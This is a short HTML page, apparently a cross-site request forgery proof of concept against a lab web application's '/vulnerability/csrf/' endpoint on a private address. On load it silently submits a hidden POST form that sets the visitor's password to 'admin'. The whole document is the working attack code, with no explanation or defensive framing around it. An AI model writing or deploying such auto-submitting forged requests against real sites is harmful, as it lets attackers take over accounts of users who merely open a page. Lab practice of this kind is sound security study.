<body onload="document.forms[0].submit()">
<h1>hello csrf</h1>
<div style="display: none;">
<iframe name="csrf"></iframe>

    <form action="http://192.168.1.5:5656/vulnerability/csrf/" method="POST">    New password:<br>
    <input type="password" AUTOCOMPLETE="off" name="password_new" value="admin"><br>
    Confirm new password: <br>
    <input type="password" AUTOCOMPLETE="off" name="password_conf" value="admin">
    <br>
    <input type="text" value="Change" name="Change">
    </form>
</body>
